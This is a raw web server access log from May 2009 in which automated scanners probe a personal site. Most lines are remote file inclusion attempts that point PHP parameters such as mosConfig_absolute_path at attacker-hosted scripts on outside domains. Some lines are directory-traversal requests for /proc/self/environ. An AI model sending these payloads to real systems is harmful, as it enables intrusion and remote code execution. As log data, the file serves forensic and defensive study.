123.143.98.5 - - [20/May/2009:09:28:39 -0700] "GET /show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:39 -0700] "GET /logs/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:39 -0700] "GET /logs/access_090120.log/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:28:41 -0700] "GET /logs/access_080703.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:28:42 -0700] "GET /logs/access_080826.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:28:47 -0700] "GET /logs/access_080723.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:28:47 -0700] "GET /logs/access_081117.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:28:47 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:28:47 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:29:03 -0700] "GET /logs/access_081117.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:29:11 -0700] "GET /logs/access_081205.log%20%20//skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:29:11 -0700] "GET /skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:29:11 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:29:29 -0700] "GET /logs/access_080723.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:29:35 -0700] "GET /logs/access_090410.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:30:08 -0700] "GET /logs/access_081105.log/export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:30:09 -0700] "GET /export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:30:09 -0700] "GET /logs/export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:30:15 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:30:20 -0700] "GET /logs/access_090410.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:30:30 -0700] "GET /logs/access_090307.log%20%20//skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.63.193.186 - - [20/May/2009:09:30:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-112.jpg HTTP/1.1" 200 681132 "-" "BaiduImagespider+(+http://www.baidu.jp/spider/)" "dmulk.com"
200.93.147.154 - - [20/May/2009:09:30:36 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:30:51 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.57.13 - - [20/May/2009:09:30:57 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/teste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:00 -0700] "GET /logs/access_090410.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:31:02 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:31:02 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:31:02 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:31:11 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:12 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:31:14 -0700] "GET /logs/access_090405.log//index.php?option=com_virtuemart&page=shop.browse&category_id=43&Itemid=26&TreeId=47/=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:17 -0700] "GET /logs/access_080728.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:31:19 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=43&Itemid=26&TreeId=47/=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:31:24 -0700] "GET /logs/access_080621.log%20%20/modifyform.html?code=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:31:24 -0700] "GET /logs/access_071224.log%20%20/modifyform.html?code=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:27 -0700] "GET /logs/access_080221.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:31:28 -0700] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:31:28 -0700] "GET /logs/access_071109.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:31:33 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:40 -0700] "GET /logs/access_080728.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:31:47 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
80.67.25.3 - - [20/May/2009:09:31:49 -0700] "GET /logs/index.php?option=com_content&task=view&id=80&Itemid=46/errors.php?error=http://www.graal-plus.zp.ua//images/v2-id.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:31:49 -0700] "GET /logs/access_080221.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:31:58 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:32:00 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:32:04 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:32:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:32:12 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=43&Itemid=26&TreeId=47/=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 200 42039 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:32:16 -0700] "GET /logs/access_080510.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:32:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:32:27 -0700] "GET /logs/access_080728.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:32:38 -0700] "GET /logs/access_080221.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.25.3 - - [20/May/2009:09:32:45 -0700] "GET /index.php?option=com_content&task=view&id=80&Itemid=46/errors.php?error=http://www.graal-plus.zp.ua//images/v2-id.txt?%0D? HTTP/1.1" 200 42023 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:32:46 -0700] "GET /logs/access_080510.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:32:53 -0700] "GET /logs/index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:32:53 -0700] "GET /logs/access_080401.log%20%20/index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:33:00 -0700] "GET /index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:03 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:03 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:04 -0700] "GET /poll/png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:04 -0700] "GET /logs//poll/png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:04 -0700] "GET /logs//poll/png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:09:33:04 -0700] "GET /poll/png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
122.153.212.195 - - [20/May/2009:09:33:14 -0700] "GET /logs/access_080616.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:09:33:43 -0700] "GET /logs/access_080213.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:33:49 -0700] "GET /logs/access_090408.log//index.php?option=com_virtuemart&page=shop.browse&category_id=43&Itemid=26&TreeId=47/=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:33:56 -0700] "GET /logs/access_080510.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:09:34:00 -0700] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:34:07 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:17 -0700] "GET /atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:20 -0700] "GET /logs/access_080713.log//atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:20 -0700] "GET /atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:21 -0700] "GET /logs/access_081221.log//atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.30.79.60 - - [20/May/2009:09:34:21 -0700] "GET /bikes/dteel/ HTTP/1.0" 200 4953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:21 -0700] "GET /logs/access_080713.log//atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:21 -0700] "GET /atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:21 -0700] "GET /logs//atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:34:22 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:34:22 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:34:22 -0700] "GET /logs/access_081221.log//atom.php5?page=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:34:30 -0700] "GET /logs/access_080307.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:34:30 -0700] "GET /logs/access_080529.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:34:30 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:34:32 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:34:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:34:45 -0700] "GET /logs/access_080307.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:34:49 -0700] "GET /logs/access_080529.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:34:54 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:35:23 -0700] "GET /index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 200 41961 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.79.60 - - [20/May/2009:09:35:28 -0700] "GET /logs/access_081104.log HTTP/1.0" 200 3319794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.37 - - [20/May/2009:09:35:54 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [20/May/2009:09:35:54 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:37:53 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:37:55 -0700] "GET /naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:37:55 -0700] "GET /logs/access_081201.log%20%20//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:37:55 -0700] "GET /logs//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:38:00 -0700] "GET /naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:38:00 -0700] "GET /logs/access_081201.log%20%20//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:38:00 -0700] "GET /logs//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:38:08 -0700] "GET /logs/access_081108.log%20%20//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:38:11 -0700] "GET /logs/access_081108.log%20%20//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:38:15 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:38:25 -0700] "GET /logs/access_080724.log/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:38:25 -0700] "GET /start_lobby.php?CONFIG[MWCHAT_Libs]http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:38:26 -0700] "GET /logs/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:38:28 -0700] "GET /logs/access_090201.log/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:38:31 -0700] "GET /logs/access_080307.log//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:38:55 -0700] "GET /logs/access_081012.log%20%20//index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
